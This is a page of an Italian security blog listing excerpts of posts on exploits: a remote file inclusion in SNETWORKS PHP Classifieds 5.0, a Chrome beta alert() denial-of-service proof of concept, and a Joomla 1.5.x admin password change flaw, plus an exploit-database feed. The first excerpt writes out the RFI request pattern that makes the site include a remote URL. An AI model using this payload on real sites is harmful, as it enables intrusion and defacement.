[EXPLOIT] SNETWORKS PHP CLASSIFIEDS 5.0 – RFI

Posted By: capn3m0  Published in Exploit

4

ott

Oggi facendo il mio lavoro sono incappato in un sito con installato lo script “SNETWORKS PHP CLASSIFIEDS” constatando che è vulnerabile a diversi tipi di hacking.

Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la Remote File Inclusion utilizzata che, comunque, si trova facilmente cercando in Rete:

http://[Taget]/[Path]/config.inc.php?path_escape=<url che volete includere>?


continue reading "[EXPLOIT] SNETWORKS PHP CLASSIFIEDS 5.0 – RFI"

no comment

[EXPLOIT] Google Chrome Browser – Milw0rm

Posted By: capn3m0  Published in Exploit, Sicurezza

25

set

Vi segnalo un’exploit che è stato pubblicato oggi sull’autorevole sito Milw0rm riguado il noto Browser Google Chrome che, tengo a precisare, è ancora in versione Beta.

Tale Exploit è un DoS PoC (Proof Of Concept) che sfruttando la funzione “alert” del JavaScript opportunamente formattata consente di far aumentare il carico in memoria di Google Chrome in pochi secondi causando un crash dell’applicativo. Ricorda come realizzazione quei JavaScript che venivano utilizzati forse 10 anni fa per far crashare i Browser (o in certi casi il Pc) generando un loop di apertura di PopUp.

Per chi volesse testarlo sulla propria pelle ecco l’Exploit versione Html e, successivamente, compresso con WinRar (non vorrei farvi crashare i PC  :-) ):

Exploit Google Chrome – Milw0rm 6554

Ed eccovi alcuni screenshot del TaskManager di Chrome durante le prove.

Stato del TaskManager di Chrome appen avviato

Stato del TaskManager di Chrome appena avviato

Dopo 15 secondi la situazione era questa:


continue reading "[EXPLOIT] Google Chrome Browser – Milw0rm"

no comment

[EXPLOIT] Joomla 1.5.x Remote Admin Password Change

Posted By: capn3m0  Published in Exploit, Programmazione, Sicurezza, Vulnerabilità

14

set

In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente “com_user” per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l’accesso Admin per eseguire defacement e simili.

Al link seguente troverete l’annuncio ufficiale:

http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html

Questo, invece, quello dal Sito Italiano:

http://www.joomlaitalia.com/content/view/323/90/


continue reading "[EXPLOIT] Joomla 1.5.x Remote Admin Password Change"

no comment
Pagina 2 di 212

Sponsor

Autoradio 120x600

Feed RSS

Twitter / exploitdb

  1. exploitdb: [webapps] - MOAUB #7 - DynPage http://bit.ly/bOls8N 07/09/2010 - 10:20
    exploitdb: [webapps] - MOAUB #7 - DynPage http://bit.ly/bOls8N
  2. exploitdb: [dos] - MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow: http://bit.ly/ccDn7n 07/09/2010 - 10:20
    exploitdb: [dos] - MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow:. […]
  3. exploitdb: [remote] - Weborf http://bit.ly/aHjUAc 07/09/2010 - 07:17
    exploitdb: [remote] - Weborf http://bit.ly/aHjUAc

Translator

Blogroll